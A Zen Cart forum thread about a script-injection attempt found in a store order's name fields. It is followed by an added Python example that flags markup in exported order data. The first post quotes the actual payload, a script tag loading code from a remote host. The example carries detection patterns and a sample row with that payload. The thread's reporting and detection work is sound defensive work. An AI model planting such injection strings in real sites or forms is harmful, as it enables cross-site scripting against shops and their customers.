  1. #1
    Join Date
    Jun 2016
    Location
    New York, NY
    Posts
    81
    Plugin Contributions
    0

    Possible hacking attempt alert

    We have had one instance in a recent customer order of this string appearing in the customer and shipping address name fields:
    "<script src=//a6x.me/s/3˃˂/script˃". Searching the Web I can find only one other occurrence of this at
    https://elitecollegepapers.blog/i-wa...other/03/2024/
    It looks like that site may also be using Zen Cart.
    The IP address of a6x.me is 172.67.135.15 and the IP address the order was made from is 149.28.252.158.
    Both addresses are blacklisted on seven servers listed at multirbl.valli.org.
    Any idea if this is a real hacking attempt that could compromise a Zen Cart database or just some twerp goofing around?
    Would be grateful for advice.

  2. #2
    Join Date
    Sep 2009
    Location
    Stuart, FL
    Posts
    12,501
    Plugin Contributions
    88

    Re: Possible hacking attempt alert

    See this thread: https://www.zen-cart.com/showthread....-v1-5-8-series

    It's a real hacking attempt.

  3. #3
    Join Date
    Jun 2016
    Location
    New York, NY
    Posts
    81
    Plugin Contributions
    0

    Re: Possible hacking attempt alert

    @lat9 Thank you for the speedy response.

  4. #4
    Join Date
    Jun 2016
    Location
    New York, NY
    Posts
    81
    Plugin Contributions
    0

    Re: Possible hacking attempt alert

    Installation of the security patch was simple - so thank you for this. Would be nice if the spam_cleanup_check script could also list the actual SPAM accounts, too.

  5. #5
    Join Date
    Mar 2010
    Posts
    52
    Plugin Contributions
    0

    Re: Possible hacking attempt alert

    Hi Guys

    I've followed the instructions on https://www.zen-cart.com/showthread....-v1-5-8-series.

    But after I applied the SQL patch and ran spam_cleanup_check.php, it still shows "One or more SPAM accounts found, you should change all admin passwords and your admin directory name."

    Is this normal?

    Thanks

  6. #6
    Join Date
    Feb 2006
    Location
    Tampa Bay, Florida
    Posts
    9,704
    Plugin Contributions
    123

    Re: Possible hacking attempt alert

    Yes, it means your site was attacked. Go ahead and do what it says and install the updated database.php file patch and you'll be protected.
    That Software Guy. My Store: Zen Cart Modifications
    Available for hire - See my ad in Services
    Plugin Moderator, Documentation Curator, Chief Cook and Bottle-Washer.
    Do you benefit from Zen Cart? Then please support the project.

  7. #7
    Join Date
    Jan 2004
    Posts
    66,373
    Blog Entries
    7
    Plugin Contributions
    274

    Re: Possible hacking attempt alert

    Originally posted by SPython:
    Installation of the security patch was simple - so thank you for this. Would be nice if the spam_cleanup_check script could also list the actual SPAM accounts, too.
    You can do an admin search for "FAKE ACCOUNT" and clean up whatever you wish.

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

  8. #8
    Join Date
    May 2012
    Posts
    3
    Plugin Contributions
    0

    Re: Possible hacking attempt alert

    Does anyone know what they were able to "do" by putting that script tag value in the field? Did they steal information or what is the fallout? I applied the patch and changed url/passwords, so I guess I should now be protected, but I am curious what may have happened during the attack.
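
Added example, not part of the thread and not Zen Cart's own code: a Python check that lists which exported order rows carry markup in a name field, the kind of string quoted in the first post. It folds lookalike angle brackets to ASCII before matching, because the quoted string mixes ASCII `<` with `˃` and `˂`; the CSV column names and the sample rows are constructed assumptions.

```python
import csv
import io
import re

# Lookalike angle brackets folded to ASCII before matching (the string
# quoted in the thread mixes ASCII "<" with U+02C2 / U+02C3).
LOOKALIKES = str.maketrans({
    "\u02c2": "<", "\u02c3": ">",   # modifier letter arrowheads
    "\u2039": "<", "\u203a": ">",   # single angle quotation marks
    "\uff1c": "<", "\uff1e": ">",   # fullwidth less-than / greater-than
})

# Things a person's name never needs: tags, src=/href= attributes,
# inline event handlers, javascript: URLs.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*[a-z!]|\b(?:src|href)\s*=|\bon[a-z]+\s*=|javascript\s*:",
    re.IGNORECASE,
)

def is_suspicious(value: str) -> bool:
    """True when the value contains markup after folding lookalikes."""
    return bool(SUSPICIOUS.search(value.translate(LOOKALIKES)))

def flag_rows(csv_text, fields):
    """Return (order_id, field, value) for every listed field holding markup."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        for field in fields:
            value = row.get(field) or ""
            if is_suspicious(value):
                hits.append((row["order_id"], field, value))
    return hits

# Constructed sample export; example.invalid stands in for the real host,
# and the column names are hypothetical.
SAMPLE = (
    "order_id,customer_name,shipping_name\n"
    "1001,Ann O'Neil,Ann O'Neil\n"
    "1002,<script src=//example.invalid/s/3\u02c3\u02c2/script\u02c3,J. Smith\n"
    "1003,José Núñez-García,\uff1cb\uff1eBob\uff1c/b\uff1e\n"
)

if __name__ == "__main__":
    for order_id, field, value in flag_rows(SAMPLE, ["customer_name", "shipping_name"]):
        print(f"order {order_id}: {field} = {value!r}")
```

Legitimate names with apostrophes, hyphens and accented letters pass unflagged; only rows whose name fields contain tag-like or attribute-like text are reported for review.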

 

 

Zen-Cart, Internet Selling Services, Klamath Falls, OR